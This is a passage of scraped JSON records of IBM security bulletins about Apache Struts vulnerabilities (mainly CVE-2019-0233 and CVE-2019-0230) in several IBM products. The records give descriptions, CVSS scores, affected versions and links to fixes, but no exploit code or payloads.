**[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling Order Management| 10.0 \n \n\n\n## Remediation/Fixes\n\nOrder Management on premise release notes - <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=software-fixes-by-fix-pack-version>\n\nFix Central Link (**FP details URL)**: \n[http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&source=SAR](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FSterling+Selling+and+Fulfillment+Foundation&fixids=10.0.0.0-Sterling-SSFF-All-fp29-Installer&source=SAR>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T01:06:34", "type": "ibm", "title": "Security Bulletin: IBM Sterling Order Management 
Apache Struts vulnerablity", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2022-05-11T01:06:34", "id": "C22DE952FD6E1544B14AE2735F81ACAE3EF08509FC895F0AAF0AC7485A98F798", "href": "https://www.ibm.com/support/pages/node/6565845", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:01:56", "description": "## Summary\n\nIBM Sterling File Gateway has addressed multiple security vulnerabilities in Apache Struts\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. 
By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling File Gateway| 2.2.0.0 - 6.0.3.2 \n \n## Remediation/Fixes\n\n** Product & Version**| **APAR**| ** Remediation & Fix** \n---|---|--- \n2.2.0.0 - 2.2.6.5_2| IT34076| Apply IBM Sterling B2B Integrator version 5.2.6.5_3, 6.0.3.3 or 6.1.0.0 on [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/Sterling+B2B+Integrator&release=All&platform=All&function=all>) \n6.0.0.0 - 6.0.3.2| IT34076| Apply IBM Sterling B2B Integrator version 6.0.3.3 or 6.1.0.0 on [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/Sterling+B2B+Integrator&release=All&platform=All&function=all>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-22T15:14:01", "type": "ibm", "title": "Security Bulletin: Multiple Security Vulnerabilities in Apache Struts Affect IBM Sterling File Gateway (CVE-2019-0233, CVE-2019-0230)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2022-07-22T15:14:01", "id": "C6AE70E5471CDF678253E267AB7C45FA772A777F24502EE50E243BD88E300D13", "href": "https://www.ibm.com/support/pages/node/6324787", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:49:24", "description": "## Summary\n\nApache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. 
By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.1.10 \nContent Collector for Microsoft SharePoint| 4.0.1.10 \nContent Collector for File Systems| 4.0.1.10 \nContent Collector for IBM Connections| 4.0.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1.10| Use Content Collector for Email 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for File Systems| 4.0.1.10| Use Content Collector for File Systems 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for Microsoft SharePoint| 4.0.1.10| Use Content Collector for Microsoft SharePoint 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for IBM Connections| 4.0.1.10| Use Content Collector for IBM Connections 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 
3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-28T19:21:52", "type": "ibm", "title": "Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-10-28T19:21:52", "id": "20DAAA2A40C4A633F7230B8255F0CADBA6E88A77DD305EC21132BECBFF011089", "href": "https://www.ibm.com/support/pages/node/6356621", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:49:24", "description": "## Summary\n\nApache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. 
By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.1.10 \nContent Collector for Microsoft SharePoint| 4.0.1.10 \nContent Collector for File Systems| 4.0.1.10 \nContent Collector for IBM Connections| 4.0.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1.10| Use Content Collector for Email 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for File Systems| 4.0.1.10| Use Content Collector for File Systems 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for Microsoft SharePoint| 4.0.1.10| Use Content Collector for Microsoft SharePoint 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for IBM Connections| 4.0.1.10| Use Content Collector for IBM Connections 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", 
"version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-28T19:08:30", "type": "ibm", "title": "Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-10-28T19:08:30", "id": "461BBFF276D2BD07EE935B18691B56E01933360B1B42DAE8AAFFC1167BCA5486", "href": "https://www.ibm.com/support/pages/node/6356619", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:50:43", "description": "## Summary\n\nFix is available for vulnerabilities in Apache Struts affecting Tivoli Netcool/OMNIbus WebGUI (CVE-2019-0233, CVE-2019-0230).\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Tivoli Netcool/OMNIbus_GUI| 8.1.x \n \n\n\n## Remediation/Fixes\n\nProduct| VRMF| APAR | Remediation/First Fix \n---|---|---|--- \nTivoli Netcool/OMNIbus WebGUI| 8.1.0| IJ27034| Apply Fix Pack 20 \n([Fix Pack for WebGUI 8.1.0 Fix Pack 20](<https://www.ibm.com/support/pages/node/6236916> \"Fix Pack for WebGUI 8.1.0 Fix Pack 20\" )) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-23T04:29:58", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Struts affect Tivoli Netcool/OMNIbus WebGUI (CVE-2019-0233, CVE-2019-0230)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-09-23T04:29:58", "id": "9235ED396A90BB944C2B22072DE6B91B22155C3982DDD732067344CA700C0ADE", "href": "https://www.ibm.com/support/pages/node/6336355", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:44:04", "description": "## Summary\n\nVulnerabilities in Apache Struts affect IBM Tivoli Application Dependency Discovery Manager (CVE-2019-0233, CVE-2019-0230)\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n**DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n**CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n**DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. 
\nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM Tivoli Application Dependency Discovery Manager | 7.3.0.7 \n \n## Remediation/Fixes\n\n**Fix** | **VRMF** | **APAR** | **How to acquire fix** \n---|---|---|--- \nefix_struts2.5.22_FP7200218.zip | 7.3.0.7 | None | [Download eFix](<https://www.secure.ecurep.ibm.com/download/?id=UpR3LS6M2oBcbLFNfcXFzqCsw2d008xhOwZDwfQ15h0> \"Download eFix\" ) \n \nPlease get familiar with eFix readme in etc/<efix_name>_readme.txt\n\n## Workarounds and Mitigations\n\nThe above eFix is applicable can be downloaded and applied directly.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T13:33:14", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache Struts affect IBM Tivoli Application Dependency Discovery Manager.", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2021-04-13T13:33:14", "id": "35DB525D4E07A09A6F2976ED4B93F380507E2F51F096B5749BE6E096C57DD8BD", "href": "https://www.ibm.com/support/pages/node/6347964", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-27T21:49:13", "description": "## Summary\n\nApache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Collector for Email| 4.0.1.10 \nContent Collector for Microsoft SharePoint| 4.0.1.10 \nContent Collector for File Systems| 4.0.1.10 \nContent Collector for IBM Connections| 4.0.1.10 \n \n \n\n\n## Remediation/Fixes\n\n**Product** | **VRM**| **Remediation** \n---|---|--- \nContent Collector for Email| 4.0.1.10| Use Content Collector for Email 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for File Systems| 4.0.1.10| Use Content Collector for File Systems 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for Microsoft SharePoint| 4.0.1.10| Use Content Collector for Microsoft SharePoint 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \nContent Collector for IBM Connections| 4.0.1.10| Use Content Collector for IBM Connections 4.0.1.10 [Interim Fix IF014](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.10-IBM-ICC-IF014&source=SAR> \"Interim Fix IF014\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", 
"version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-04T09:04:41", "type": "ibm", "title": "Security Bulletin: Apache Struts (Publicly disclosed vulnerability) affects Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2019-0233"], "modified": "2020-11-04T09:04:41", "id": "3477DD0939B4B8CC59240F8DCC09305A2F7C13CA45285602F1755CDF6F593B52", "href": "https://www.ibm.com/support/pages/node/6359443", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T05:58:27", "description": "## Summary\n\nApache Struts is used by IBM Call Center as part of its web application framework used for creating Java EE web applications. It is vulnerable to various CVEs, listed below. We recommend upgrading to the latest supported version of Struts that was released as part of the latest FixPack 12.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2011-1772](<https://vulners.com/cve/CVE-2011-1772>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by Xwork when generating the action name for error pages. 
If Dynamic Method Invocation is enabled, a remote attacker could exploit this vulnerability using the tag in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 2.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/67354](<https://exchange.xforce.ibmcloud.com/vulnerabilities/67354>) for the current score. \nCVSS Vector: (AV:N/AC:H/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-0838](<https://vulners.com/cve/CVE-2012-0838>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the evaluation of an OGNL expression during a conversion error. An attacker could exploit this vulnerability using invalid input to a field to modify run-time data and execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/73690](<https://exchange.xforce.ibmcloud.com/vulnerabilities/73690>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: 